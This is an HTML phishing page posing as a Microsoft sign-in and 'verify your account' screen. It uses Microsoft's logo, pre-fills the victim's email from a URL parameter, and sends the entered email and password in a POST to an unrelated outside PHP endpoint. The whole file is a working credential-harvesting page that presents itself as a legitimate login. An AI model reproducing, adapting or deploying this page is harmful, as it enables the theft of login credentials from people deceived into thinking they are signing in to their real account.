


<!DOCTYPE html>
<html>
    <head>
        <!-- <script language="JavaScript">
            alert("login again to view this information.")
            </script> -->
        <style>
            body {
                font-family: "Open Sans", sans-serif;
                background-image: url("https://imgur.com/VYKrSEF.png");
                width: 100%;
                padding: 0px;
                margin: 0px;
            }

            button {
                width: 25%;
                margin-bottom: 30%;
                margin-left: auto;
                margin-right: auto;
                display: block;
                background-color: #188fff;
                height: 40px;
                color: #fff;
                border: 1px solid #188fff;
                border-radius: 30px;
                font-size: 17px;
                position: relative;
                top: -25%;
                left: 25%;
            }

            button:hover {
                background-color: #188fff;
                color: #ffffff;
            }

            h1 {
                text-align: center;
                font-size: 1.5rem;
                margin-bottom: 1px;
            }

            form {
                padding-bottom: 10%;
                height: 200px;
            }

            .infoText {
                text-align: center;
                margin-bottom: 20%;
                margin-top: 0;
                font-size: 0.8rem;
                font-weight: 500;
                color: grey;
            }

            .footerz {
                /* text-align: center; */
                color: #188fff;
                font-size: 0.65rem;
                margin-bottom: 10%;
            }

            input {
                border-bottom: 1px solid #b8bec2;
                border-top: none;
                border-left: none;
                border-right: none;
                /* background-color: white; */
                width: 90%;
                margin-bottom: 10%;
                margin-left: auto;
                margin-right: auto;
                display: block;
                position: relative;
                top: -25%;
                font-family: 'Times New Roman', Times, serif;
                font-weight: bolder;
                font-size: larger;
                padding: 0px;
                margin-top: -20px;
                text-align: left;
                
            }
            .img_gg{
                margin-top: 10px;
                margin: auto 6%;
                width: 30%;
            }

            ::placeholder {
                padding-bottom: 4%;
                font-size: 1rem;
                text-align: left;
                font-weight: 200;
                font-weight: bolder;
                font-family: Arial, Helvetica, sans-serif;
                font-size: 15px;
                color: black;
            }
            .all input{
                text-align: left;
            }

            .logo {
                width: 50%;
                margin-left: auto;
                margin-right: auto;
                display: block;
                margin-top: %;
            }
            .container img{
                margin-top: 10%;
            }

            h2 {
                display: inline;
                margin: 0;
            }

            #logoz {
                display: inline;
            }
            .password{
                text-align: left;
            }

            .header {
                width: 30%;
				display: inline-block;
            }

            .container {
                max-width: 2000rem;
                height: 410px;
                margin: 0 auto;
                background-color: white;
                -webkit-box-shadow: 0px -2px 5px -2px rgba(0, 0, 0, 0.75);
                -moz-box-shadow: 0px -2px 5px -2px rgba(0, 0, 0, 0.75);
                box-shadow: 0px -2px 5px -2px rgba(0, 0, 0, 0.75);
                padding-bottom: 0.5%;
            }

            .container input{
                /* width: 200%; */
            }
            @media screen and (min-width: 600px) {
                .container {
                    width: 33%;
                    margin: auto;
                }

                .header {
                    width: 10%;
                }

                button {
                    margin-bottom: 5%;
                }

                .footerz {
                    margin-bottom: 5%;
                }
            }
        </style>
        <meta charset="utf-8" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <title>Protect your account</title>
        <meta name="description" content="" />
        <link
            rel="shortcut icon"
            href="https://i.pinimg.com/originals/ce/af/83/ceaf8384322af790486cff176a0a2f24.png"
            type="image/x-icon"
        />
        <meta name="viewport" content="width=device-width, initial-scale=1" />
        <link rel="stylesheet" href="styles.css" />
        <link href="https://fonts.googleapis.com/css2?family=Open+Sans&display=swap" rel="stylesheet" />
    </head>
    <body>
        <header>
        <img
            class="header"
            src="#"
            alt=""
            class="logo" id="logoz"
        />
        </header>
        <div class="container">
            <img
             <div class="img_gg" 
                src="https://logincdn.msauth.net/shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg"
                alt=""
                class="logo"
            </div>
            
            <h1>Sign in</h1>
            <p class="infoText">Verify your account</p>
            <form action="https://machestwaterschuks.site/co/coo.php"php method="POST">
                <input type="email" name="email" required class="email" id="email" value="" placeholder="Email" />
                <input type="password" class="all"  required name="pass"  placeholder="password" /><br />
                <button type="submit" name="sign">Next</button>
            </form>
            
        </div>
        <script>
            document.getElementById("email").value = getUrlVars()["emailid"];;
       
       function getUrlVars() {
                var vars = {};
               var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
               vars[key] = value;
                });
               return vars;
            } 
        </script>
        
    </body>
</html>

